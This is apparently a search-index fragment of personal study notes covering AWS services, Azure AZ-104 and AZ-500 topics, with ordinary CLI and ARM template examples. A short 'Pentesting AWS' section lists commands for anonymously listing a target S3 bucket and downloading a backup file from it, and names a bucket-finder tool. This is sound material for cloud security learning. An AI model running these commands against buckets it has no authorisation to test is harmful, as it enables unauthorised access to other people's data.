                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-neptune","title":"Amazon Neptune","text":"

                            Fully managed graph database. A popular graph dataset would be a social network. Highly available across 3 AZs, with up to 15 read replicas. It can store up to billions of relations and query the graph with milliseconds of latency.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-quantum-ledger-database-qldb","title":"Amazon Quantum Ledger Database (QLDB)","text":"
                            • A ledger is a book recording financial transactions. QLDB is going to be just to have a ledger of financial transactions.
                            • It's a fully managed database, it's serverless, highly available, and has replication of data across three AZ.
                            • Used to review history of all the changes made to your application data over time.
                            • Immutable system: no entry can be removed or modified; cryptographically verifiable.
                            • Difference with Amazon Managed Blockchain: no decentralization component. \u00a0QLDB has a central authority component and it's a ledger, whereas managed blockchain is going to have a de-centralization component as well.
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-managed-blockchain","title":"Amazon Managed Blockchain","text":"

                            Managed Blockchain by Amazon is a service to join public blockchain networks or create your own scalable private blockchain network within AWS. It's compatible with two blockchain frameworks so far: Hyperledger Fabric and Ethereum.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-glue","title":"Amazon Glue","text":"

                            Glue is a managed extract, transform, and load (ETL) service. It's fully serverless.

                            ETL is very helpful when you have datasets that are not exactly in the right form for analytics; the ETL service prepares and transforms that data.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#glue-data-catalog","title":"Glue Data Catalog","text":"

                            The Glue Data Catalog is a catalog of the datasets in your AWS infrastructure: it keeps a reference of everything (the column names, the field names, the field types, et cetera).

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#database-migration-service-dms","title":"Database Migration Service (DMS)","text":"

                            DMS provides quick and secure database migration into AWS that's resilient and self-healing.

                            It supports both homogeneous and heterogeneous migrations.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-compute-services","title":"Amazon Compute Services","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#elastic-container-service-ecs","title":"Elastic Container Service (ECS)","text":"

                            It's the way to launch containers in AWS. You must provision and maintain the infrastructure (EC2 instances). It integrates with the Application Load Balancer.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#fargate","title":"Fargate","text":"

                            It's also used to launch containers in AWS, but you don't need to provision the infrastructure (no EC2 instances to manage).

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#elastic-container-registry-ecr","title":"Elastic Container Registry (ECR)","text":"

                            It's a private Docker registry on AWS. This is where you store your Docker images.

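                            A minimal push sketch with the AWS CLI and Docker; the account ID 123456789012, the region, and the image name my-image are placeholders:

                            # authenticate Docker against the private registry\naws ecr get-login-password --region us-east-1 | docker login --username AWS --password-stdin 123456789012.dkr.ecr.us-east-1.amazonaws.com\n# tag and push a local image\ndocker tag my-image:latest 123456789012.dkr.ecr.us-east-1.amazonaws.com/my-image:latest\ndocker push 123456789012.dkr.ecr.us-east-1.amazonaws.com/my-image:latest\n
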
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#lambda","title":"Lambda","text":"
                            • It's a serverless compute service that lets you run functions in the cloud. We have virtual functions that are time-limited and run on demand. You pay per request and compute time.
                            • Lambda is event-driven: functions get invoked by AWS when needed.
                            • It supports many languages.
                            • Lambda can be run as a Lambda Container Image.

                            The API Gateway service can expose Lambda functions as HTTP APIs.

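                            A minimal invocation sketch with the AWS CLI, assuming a hypothetical function named my-function already exists:

                            # list deployed functions in the current region\naws lambda list-functions\n# invoke the function synchronously and save its output\naws lambda invoke --function-name my-function response.json\ncat response.json\n
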
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-batch","title":"Amazon Batch","text":"

                            Runs batch jobs on AWS across managed EC2 instances.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-deployments-and-managing-infrastructure","title":"Amazon: Deployments and managing infrastructure","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-cloudformation","title":"AWS CloudFormation","text":"
                            • Infrastructure as Code.
                            • It creates the architecture and gives you a diagram.
                            • In CloudFormation you create a Stack, select a template (which generates a YAML file), and configure other settings: IAM permissions, costs. See the CLI sketch below.
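
                            A minimal deployment sketch with the AWS CLI; template.yaml and my-stack are placeholder names:

                            # create a stack from a local template\naws cloudformation create-stack --stack-name my-stack --template-body file://template.yaml\n# follow the deployment status\naws cloudformation describe-stacks --stack-name my-stack\n
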
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-cloud-development-kit-cdk","title":"Amazon Cloud Development Kit (CDK)","text":"

                            It allows you to define your cloud infrastructure using a familiar language. Code is compiled into a CloudFormation template.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elastic-beanstalk","title":"Amazon Elastic Beanstalk","text":"

                            Elastic Beanstalk is a developer-centric view of deploying an application on AWS.

                            It's PaaS.

                            It has a full monitoring suite: a health agent pushes metrics to CloudWatch, checks app health, and publishes health events.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#codedeploy","title":"CodeDeploy","text":"

                            CodeDeploy deploys your application automatically.

                            It's a hybrid service because it works with EC2 and on-premises servers.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-codecommit","title":"AWS CodeCommit","text":"

                            It's AWS's version-control code repository.

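                            A minimal sketch, assuming a hypothetical repository named my-repo in us-east-1:

                            # create the repository\naws codecommit create-repository --repository-name my-repo\n# clone it like any other Git remote\ngit clone https://git-codecommit.us-east-1.amazonaws.com/v1/repos/my-repo\n
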
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-codebuild","title":"AWS CodeBuild","text":"

                            It's a code-building service in the cloud. It compiles source code, runs tests, and produces packages that are ready to be deployed.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-codepipeline","title":"AWS CodePipeline","text":"

                            CodePipeline orchestrates the different steps to have code automatically pushed to production. It's the basis for CI/CD (Continuous Integration and Continuous Delivery).

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-codeartefact","title":"AWS CodeArtefact","text":"

                            It's a service used to store and retrieve the software package dependencies needed for builds. It works with common dependency management tools such as Maven, Gradle, npm, twine, pip, and NuGet. It's an artifact management system.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-codestar","title":"AWS CodeStar","text":"

                            Unified UI to easily manage software development activities in one place. You can edit code directly in the cloud using AWS Cloud9.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-cloud9","title":"AWS Cloud9","text":"

                            AWS Cloud9 is a cloud IDE for writing, running and debugging code directly in the cloud.

                            Code collaboration in real time.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-global-applications","title":"Amazon Global Applications","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-route-53","title":"Amazon Route 53","text":"

                            Managed DNS by AWS. It supports record types such as A, AAAA, and CNAME. It offers several routing policies (see the CLI sketch after the list):

                            • Simple routing policy (no health checks).
                            • Weighted routing policy (with percentages).
                            • Latency routing policy (based on latency between users and servers).
                            • Failover routing policy (for disaster recovery).
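
                            A minimal sketch with the AWS CLI; the hosted zone ID and the change.json change batch are placeholders:

                            # find the hosted zone ID\naws route53 list-hosted-zones\n# apply a record change described in a JSON change batch\naws route53 change-resource-record-sets --hosted-zone-id Z0000000000000 --change-batch file://change.json\n
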
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-cloudfront","title":"Amazon CloudFront","text":"

                            It's AWS's Content Delivery Network (CDN). So far it has 216 points of presence. It has DDoS protection and improves read performance, since content is cached at the edge.

                            Origins: S3 (protected with OAC, Origin Access Control, which replaces OAI, Origin Access Identity) and custom HTTP origins.

                            Files are cached for a TTL (time to live).

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#s3-transfer-acceleration","title":"S3 Transfer Acceleration","text":"

                            Increases transfer speed to and from S3 across regions by using the AWS global network.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-global-accelerator","title":"AWS Global Accelerator","text":"

                            Improves global application availability and performance using the AWS global network.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-outpost","title":"AWS Outpost","text":"

                            AWS Outposts are \"server racks that offer the same AWS infrastructure, services, APIs & tools to build your own applications on-premises just as in the cloud\". This allows you to extend AWS services to your on-premises environment.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-wavelength","title":"AWS WaveLength","text":"

                            AWS WaveLength Zones are infrastructure deployments embedded within telecommunications providers' datacenters at the edge of 5G networks. It brings AWS services to the edge of 5G networks. Traffic never leaves the Communication Service Provider (CSP) networks.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-cloud-integrations","title":"Amazon Cloud integrations","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-sqs","title":"Amazon SQS","text":"

                            It's the Simple Queue Service. There are two types of queues:

                            • Standard queues: the oldest AWS offering. It's a fully managed service.
                            • FIFO queues.

                            It allows us to decouple application components (see the sketch below).

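                            A minimal producer/consumer sketch with the AWS CLI; my-queue, the account ID, and the region in the queue URL are placeholders:

                            aws sqs create-queue --queue-name my-queue\n# producer side\naws sqs send-message --queue-url https://sqs.us-east-1.amazonaws.com/123456789012/my-queue --message-body 'order 42 created'\n# consumer side\naws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/123456789012/my-queue\n
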
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-kinesis","title":"Amazon Kinesis","text":"

                            It's a real-time big data streaming service.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-sns","title":"Amazon SNS","text":"

                            Amazon SNS stands for Simple Notification Service. It creates a set of notifications about certain events. Event publishers send each message to a single SNS topic, and each subscriber to the topic gets all the messages. It's a pub/sub service.

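                            A minimal pub/sub sketch with the AWS CLI; the topic name, account ID, and e-mail address are placeholders:

                            aws sns create-topic --name my-topic\n# every confirmed subscriber receives every published message\naws sns subscribe --topic-arn arn:aws:sns:us-east-1:123456789012:my-topic --protocol email --notification-endpoint user@example.com\naws sns publish --topic-arn arn:aws:sns:us-east-1:123456789012:my-topic --message 'hello subscribers'\n
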
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-mq","title":"Amazon MQ","text":"

                            Amazon MQ is a managed message broker service for two technologies: RabbitMQ and ActiveMQ.

                            SQS and SNS are cloud-native services built on proprietary AWS protocols; they use their own sets of APIs.

                            If you run traditional applications on-premises, you may use open protocols such as MQTT, AMQP, STOMP, OpenWire, or WSS. When migrating your application to the cloud, you may not want to re-engineer it to use the SQS and SNS APIs. Instead, you can keep the traditional protocols you're used to, and for that you can use Amazon MQ.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-cloud-monitoring","title":"Amazon Cloud Monitoring","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/pentesting-aws/","title":"Pentesting Amazon Web Services (AWS)","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/aws/pentesting-aws/#amazon-s3","title":"Amazon S3","text":"

                            S3 is an object storage service in the AWS cloud. With S3, you can store objects in buckets. Files stored in an Amazon S3 bucket are called S3 objects.

                            aws-cli is the command-line tool for interacting with S3; it can list buckets and objects (see the sketch below).

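                            A minimal anonymous-enumeration sketch; target-bucket and the object name are placeholders, and --no-sign-request makes the calls without credentials:

                            # list the bucket contents anonymously\naws s3 ls s3://target-bucket --no-sign-request\n# download an interesting object\naws s3 cp s3://target-bucket/backup.sql . --no-sign-request\n
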
                            ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/aws/pentesting-aws/#enumerate-instances","title":"Enumerate instances","text":"

                            insp3ctor: the AWS bucket finder.

                            ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/az-104-preparation/","title":"AZ-104 Microsoft Azure Administrator certificate","text":"

                            Sources of these notes

                            • The Microsoft e-learn platform.
                            • Udemy course: Prove your AZ-104 Microsoft Azure Administrator skills to the world. Updated.
                            ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#configure-azure-resources-with-tools","title":"Configure Azure resources with tools","text":"

                            There's approximate parity between the portal, the Azure CLI, and Azure PowerShell with respect to the Azure objects they can administer and the configurations they can create. They're also all cross-platform. Typically, you'll consider several factors when making your choice:

                            • Automation: Do you need to automate a set of complex or repetitive tasks? Azure PowerShell and the Azure CLI support automation, but Azure portal doesn't.
                            • Learning curve: Do you need to complete a task quickly without learning new commands or syntax? The Azure portal doesn't require you to learn syntax or memorize commands. In Azure PowerShell and the Azure CLI, you must know the detailed syntax for each command you use.
                            • Team skillset: Does your team have existing expertise? For example, your team might have used PowerShell to administer Windows. If so, they'll quickly become comfortable using Azure PowerShell.
                            ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-cloud-shell","title":"Azure Cloud Shell","text":"
                            • Is temporary and requires a new or existing Azure Files share to be mounted.
                            • Offers an integrated graphical text editor based on the open-source Monaco Editor.
                            • Authenticates automatically for instant access to your resources.
                            • Runs on a temporary host provided on a per-session, per-user basis.
                            • Times out after 20 minutes without interactive activity.
                            • Requires a resource group, storage account, and Azure File share.
                            • Uses the same Azure file share for both Bash and PowerShell.
                            • Is assigned to one machine per user account.
                            • Persists $HOME using a 5-GB image held in your file share.
                            • Permissions are set as a regular Linux user in Bash.
                            ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-powershell","title":"Azure PowerShell","text":"

                            Azure PowerShell is a module that you add to Windows PowerShell or PowerShell Core to enable you to connect to your Azure subscription and manage resources. Azure PowerShell requires PowerShell to function. PowerShell provides services such as the shell window and command parsing. Azure PowerShell adds the Azure-specific commands.

                            See cheat sheet for Azure PowerShell.

                            ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-cli","title":"Azure CLI","text":"

                            Azure CLI is a command-line program to connect to Azure and execute administrative commands on Azure resources. The Azure CLI is available in two ways: inside a browser via the Azure Cloud Shell, or as a local installation on Linux, Mac, or Windows. It allows administrators and developers to execute their commands through a terminal, command-line prompt, or script instead of a web browser.

                            See cheat sheet for Azure CLI.

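                            A minimal sketch of the workflow; the resource group name and location are placeholders:

                            # authenticate against the subscription\naz login\n# create a resource group and list existing VMs\naz group create --name myResourceGroup --location eastus\naz vm list --output table\n
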
                            ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-resource-manager-arm","title":"Azure Resource Manager (ARM)","text":"

                            Azure Resource Manager provides several benefits:

                            • You can deploy, manage, and monitor all the resources for your solution as a group, rather than handling these resources individually.
                            • You can repeatedly deploy your solution throughout the development lifecycle and have confidence your resources are deployed in a consistent state.
                            • You can manage your infrastructure through declarative templates rather than scripts.
                            • You can define the dependencies between resources so they're deployed in the correct order.
                            • You can apply access control to all services in your resource group because Role-Based Access Control (RBAC) is natively integrated into the management platform.
                            • You can apply tags to resources to logically organize all the resources in your subscription.
                            • You can clarify your organization's billing by viewing costs for a group of resources sharing the same tag.

                            Two concepts that I need to review for this:

                            • resource provider\u00a0- A service that supplies the resources you can deploy and manage through Resource Manager. Each resource provider offers operations for working with the resources that are deployed. Some common resource providers are Microsoft.Compute, which supplies the virtual machine resource, Microsoft.Storage, which supplies the storage account resource, and Microsoft.Web, which supplies resources related to web apps. The Microsoft.KeyVault resource provider offers a resource type called vaults for creating the key vault, useful if you want to store keys and secrets. The name of a resource type is in the format: {resource-provider}/{resource-type}. For example, the key vault type is Microsoft.KeyVault/vaults.
                            • declarative syntax\u00a0- Syntax that lets you state \"Here is what I intend to create\" without having to write the sequence of programming commands to create it. The Resource Manager template is an example of declarative syntax. In the file, you define the properties for the infrastructure to deploy to Azure.
                            ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#resource-groups","title":"Resource groups","text":"

                            Creating resource groups:

                            • All the resources in your group should share the same lifecycle. You deploy, update, and delete them together. If one resource, such as a database server, needs to exist on a different deployment cycle it should be in another resource group.
                            • Each resource can only exist in one resource group.
                            • You can add or remove a resource to a resource group at any time.
                            • You can move a resource from one resource group to another group. Limitations do apply to\u00a0moving resources.
                            • A resource group can contain resources that reside in different regions.
                            • A resource group can be used to scope access control for administrative actions.
                            • A resource can interact with resources in other resource groups. This interaction is common when the two resources are related but don't share the same lifecycle (for example, web apps connecting to a database).

                            When creating a resource group, you need to provide a location for that resource group. You may be wondering, \"Why does a resource group need a location? And, if the resources can have different locations than the resource group, why does the resource group location matter at all?\" The resource group stores metadata about the resources. Therefore, when you specify a location for the resource group, you're specifying where that metadata is stored. For compliance reasons, you may need to ensure that your data is stored in a particular region.

                            Moving resources:

                            When moving resources, both the source group and the target group are locked during the operation. Write and delete operations are blocked on the resource groups until the move completes. This lock means you can't add, update, or delete resources in the resource groups. Locks don't mean the resources aren't available. For example, if you move a virtual machine to a new resource group, an application can still access the virtual machine.

                            Move operation support for resources: This page details what resources can be moved between resource groups, subscriptions, and regions.

                            To move resources, select the resource group containing those resources, and then select the\u00a0Move\u00a0button. Select the resources to move and the destination resource group. Acknowledge that you need to update scripts.

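                            The same move can be scripted. A minimal sketch with the Azure CLI, assuming hypothetical groups sourceRG/targetRG and a VM named myVM:

                            # grab the full resource ID of the VM\nvmId=$(az resource show --resource-group sourceRG --name myVM --resource-type 'Microsoft.Compute/virtualMachines' --query id --output tsv)\n# move it to the target resource group\naz resource move --destination-group targetRG --ids $vmId\n
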
                            Deleting resources:

                            See how to remove a resource group using Azure PowerShell.

                            Determine resource limits:

                            • The limits shown are the limits for your subscription.
                            • When you need to increase a default limit, there is a Request Increase link.
                            • All resources have a maximum limit listed in Azure\u00a0limits.
                            • If you are at the maximum limit, the limit can't be increased.
                            ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-resource-manager-locks","title":"Azure Resource Manager Locks","text":"

                            Creating Azure Resource Manager Locks:

                            Resource Manager locks allow organizations to put a structure in place that prevents the accidental deletion of resources in Azure.

                            • You can associate the lock with a subscription, resource group, or resource.
                            • Locks are inherited by child resources.

                            Only the Owner and User Access Administrator roles can create or delete management locks.

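                            A minimal sketch with the Azure CLI, assuming a hypothetical resource group myResourceGroup:

                            # prevent accidental deletion of everything in the group\naz lock create --name DoNotDelete --lock-type CanNotDelete --resource-group myResourceGroup\n# review the locks in place\naz lock list --resource-group myResourceGroup\n
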
                            ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-resource-manager-template","title":"Azure Resource Manager template","text":"

                            An\u00a0Azure Resource Manager template\u00a0precisely defines all the Resource Manager resources in a deployment. These are some benefits:

                            • Templates improve consistency. Resource Manager templates provide a common language for you and others to describe your deployments. Regardless of the tool or SDK that you use to deploy the template, the structure, format, and expressions inside the template remain the same.
                            • Templates help express complex deployments. Templates enable you to deploy multiple resources in the correct order. For example, you wouldn't want to deploy a virtual machine prior to creating an operating system (OS) disk or network interface. Resource Manager maps out each resource and its dependent resources, and creates dependent resources first. Dependency mapping helps ensure that the deployment is carried out in the correct order.
                            • Templates reduce manual, error-prone tasks. Manually creating and connecting resources can be time consuming, and it's easy to make mistakes. Resource Manager ensures that the deployment happens the same way every time.
                            • Templates are code. Templates express your requirements through code. Think of a template as a type of Infrastructure as Code that can be shared, tested, and versioned similar to any other piece of software. Also, because templates are code, you can create a \"paper trail\" that you can follow. The template code documents the deployment. Most users maintain their templates under some kind of revision control, such as GIT. When you change the template, its revision history also documents how the template (and your deployment) has evolved over time.
                            • Templates promote reuse. Your template can contain parameters that are filled in when the template runs. A parameter can define a username or password, a domain name, and so on. Template parameters enable you to create multiple versions of your infrastructure, such as staging and production, while still using the exact same template.
                            • Templates are linkable. You can link Resource Manager templates together to make the templates themselves modular. You can write small templates that each define a piece of a solution, and then combine them to create a complete system.
                            • Templates simplify orchestration. You only need to deploy the template to deploy all of your resources. Normally this would take multiple operations.

                            The template uses a\u00a0declarative syntax. The declarative syntax is a way of building the structure and elements that outline what resources will look like without describing the control flow. Declarative syntax is different than imperative syntax, which uses commands for the computer to perform. Imperative scripting focuses on specifying each step in deploying the resources.

                            ARM templates are idempotent, which means you can deploy the same template many times and get the same resource types in the same state.

                            Resource Manager orchestrates deploying the resources so they're created in the correct order. When possible, resources will also be created in parallel, so ARM template deployments finish faster than scripted deployments.

                            Resource Manager also has built-in validation. It checks the template before starting the deployment to make sure the deployment will succeed.

                            You can also integrate your ARM templates into continuous integration and continuous deployment (CI/CD) tools like Azure Pipelines.

                            The schema:

                            {\n    \"$schema\": \"http://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#\",\n    \"contentVersion\": \"\",\n    \"parameters\": {},\n    \"variables\": {},\n    \"functions\": [],\n    \"resources\": [],\n    \"outputs\": {}\n}\n
                            Element name Required Description $schema Yes Location of the JSON schema file that describes the version of the template language. Use the URL shown in the preceding example. contentVersion Yes Version of the template (such as 1.0.0.0). You can provide any value for this element. Use this value to document significant changes in your template. This value can be used to make sure that the right template is being used. parameters No Values that are provided when deployment is executed to customize resource deployment. variables No Values that are used as JSON fragments in the template to simplify template language expressions. functions No User-defined functions that are available within the template. resources Yes Resource types that are deployed or updated in a resource group. outputs No Values that are returned after deployment.

                            Let's start with parameters:

                            \"parameters\": {\n    \"<parameter-name>\" : {\n        \"type\" : \"<type-of-parameter-value>\",\n        \"defaultValue\": \"<default-value-of-parameter>\",\n        \"allowedValues\": [ \"<array-of-allowed-values>\" ],\n        \"minValue\": <minimum-value-for-int>,\n        \"maxValue\": <maximum-value-for-int>,\n        \"minLength\": <minimum-length-for-string-or-array>,\n        \"maxLength\": <maximum-length-for-string-or-array-parameters>,\n        \"metadata\": {\n        \"description\": \"<description-of-the parameter>\"\n        }\n    }\n}\n

                            This would be an example:

                            \"parameters\": {\n  \"adminUsername\": {\n    \"type\": \"string\",\n    \"metadata\": {\n      \"description\": \"Username for the Virtual Machine.\"\n    }\n  },\n  \"adminPassword\": {\n    \"type\": \"securestring\",\n    \"metadata\": {\n      \"description\": \"Password for the Virtual Machine.\"\n    }\n  }\n}\n

                            You're limited to 256 parameters in a template. You can reduce the number of parameters by using objects that contain multiple properties.

                            Azure Quickstart Templates\u00a0are Azure Resource Manager templates provided by the Azure community. Some templates provide everything you need to deploy your solution, while others might serve as a starting point for your template.

                            • The README.md file provides an overview of what the template does.
                            • The azuredeploy.json file defines the resources that will be deployed.
                            • The azuredeploy.parameters.json file provides the values the template needs.

                            It caught my eye: https://github.com/azure/azure-quickstart-templates/tree/master/application-workloads/blockchain/blockchain

                            You can deploy an ARM template to Azure in one of the following ways:

                            • Deploy a local template.
                            • Deploy a linked template.
                            • Deploy in a continuous deployment pipeline.

                            Example: To add a resource to your template, you'll need to know the resource provider and its types of resources. The syntax for this combination is in the form of {resource-provider}/{resource-type}.

                            See the code:

                            {\n  \"$schema\": \"https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#\",\n  \"contentVersion\": \"1.0.0.1\",\n  \"apiProfile\": \"\",\n  \"parameters\": {},\n  \"variables\": {},\n  \"functions\": [],\n  \"resources\": [\n    {\n      \"type\": \"Microsoft.Storage/storageAccounts\",\n      \"apiVersion\": \"2019-06-01\",\n      \"name\": \"learntemplatestorage123\",\n      \"location\": \"westus\",\n      \"sku\": {\n        \"name\": \"Standard_LRS\"\n      },\n      \"kind\": \"StorageV2\",\n      \"properties\": {\n        \"supportsHttpsTrafficOnly\": true\n      }\n    }\n  ],\n  \"outputs\": {}\n}\n

                            To create an ARM template, use Visual Studio Code with the \"Azure Resource Manager (ARM) Tools\" extension.

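                            A minimal deployment sketch with the Azure CLI, reusing the azuredeploy.json naming convention mentioned above; myResourceGroup is a placeholder:

                            # validate the template without deploying\naz deployment group validate --resource-group myResourceGroup --template-file azuredeploy.json\n# deploy it (add --parameters @azuredeploy.parameters.json when the template declares parameters)\naz deployment group create --resource-group myResourceGroup --template-file azuredeploy.json\n
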
                            ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#biceps-templates","title":"Biceps templates","text":"

                            Bicep is a domain-specific language (DSL) that uses declarative syntax to deploy Azure resources. In a Bicep file, you define the infrastructure you want to deploy to Azure, and then use that file throughout the development lifecycle to repeatedly deploy your infrastructure. Your resources are deployed in a consistent manner. Bicep provides concise syntax, reliable type safety, and support for code reuse. Bicep offers a first-class authoring experience for your\u00a0infrastructure-as-code\u00a0solutions in Azure.

                            How does Bicep work?

                            When you deploy a resource or series of resources to Azure, the tooling that's built into Bicep converts your Bicep template into a JSON template. This process is known as transpilation. Transpilation is the process of converting source code written in one language into another language.

                            Bicep provides many improvements over JSON for template authoring, including:

                            • Simpler syntax: Bicep provides a simpler syntax for writing templates. You can reference parameters and variables directly, without using complicated functions. String interpolation is used in place of concatenation to combine values for names and other items. You can reference the properties of a resource directly by using its symbolic name instead of complex reference statements. These syntax improvements help both with authoring and reading Bicep templates.

                            • Modules: You can break down complex template deployments into smaller module files and reference them in a main template. These modules provide easier management and greater reusability.

                            • Automatic dependency management: In most situations, Bicep automatically detects dependencies between your resources. This process removes some of the work involved in template authoring.

                            • Type validation and IntelliSense: The Bicep extension for Visual Studio Code features rich validation and IntelliSense for all Azure resource type API definitions. This feature helps provide an easier authoring experience.

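                            A minimal sketch with the Azure CLI, assuming a hypothetical main.bicep file; the CLI transpiles Bicep to ARM JSON for you:

                            # optional: inspect the transpiled ARM JSON\naz bicep build --file main.bicep\n# deploy the Bicep file directly\naz deployment group create --resource-group myResourceGroup --template-file main.bicep\n
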
                            ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/","title":"I. Manage Identity and Access","text":"Sources of this notes
                            • The Microsoft e-learn platform.
                            • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500\".
                            • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
                            • Udemy course: Azure Security: AZ-500 (updated July 2023)
                            Summary: AZ-500 Microsoft Azure Security Engineer Certification
                            • About the certificate
                            • I. Manage Identity and Access
                            • II. Platform protection
                            • III. Data and applications
                            • IV. Security operations
                            • AZ-500 and more: keep learning

                            Cheatsheets: Azure-CLI | Azure PowerShell

                            100 questions you should pass for the AZ-500 certificate

                            Azure Active Directory\u00a0(Azure AD) is a cloud-based identity and access management service.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#1-microsoft-entra-id","title":"1. Microsoft Entra ID","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#11-microsoft-entra-id-licenses","title":"1.1. Microsoft Entra ID licenses","text":"
                            • Azure Active Directory Free.\u00a0Provides user and group management, on-premises directory synchronization, basic reports, self-service password change for cloud users, and single sign-on across Azure, Microsoft 365, and many popular SaaS apps.
                            • Azure Active Directory Premium P1.\u00a0In addition to the Free features, P1 lets your hybrid users access both on-premises and cloud resources. It also supports advanced administration, such as dynamic groups, self-service group management, Microsoft Identity Manager, and cloud write-back capabilities, which allow self-service password reset for your on-premises users.
                            • Azure Active Directory Premium P2.\u00a0In addition to the Free and P1 features, P2 also offers Azure Active Directory Identity Protection to help provide risk-based Conditional Access to your apps and critical company data and Privileged Identity Management to help discover, restrict, and monitor administrators and their access to resources and to provide just-in-time access when needed.
                            • \"Pay as you go\"\u00a0feature licenses. You also get additional feature licenses, such as Azure Active Directory Business-to-Customer (B2C). B2C can help you provide identity and access management solutions for your customer-facing apps.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#12-azure-active-directory-domain-services-azure-ad-ds","title":"1.2. Azure Active Directory Domain Services (Azure AD DS)","text":"

                            There are\u00a0two ways\u00a0to provide Active Directory Domain Services in the cloud:

                            • A\u00a0managed domain\u00a0that you create using Azure Active Directory Domain Services (Azure AD DS). Microsoft creates and manages the required resources. Azure AD DS deploys, manages, patches, and secures the Active Directory Domain Services infrastructure for you. It's a managed domain experience. Azure AD DS provides a smaller subset of features than a traditional self-managed AD DS environment, which reduces some of the design and management complexity. For example, there are no AD forests, domains, sites, or replication links to design and maintain. It also guarantees access to traditional authentication mechanisms such as Kerberos and NTLM.
                            • A\u00a0self-managed\u00a0domain that you create and configure using traditional resources such as virtual machines (VMs), Windows Server guest OS, and Active Directory Domain Services (AD DS). You then continue to administer these resources. You're then able to do additional tasks, such as extending the schema or creating forest trusts. Common deployment models in a self-managed domain are:
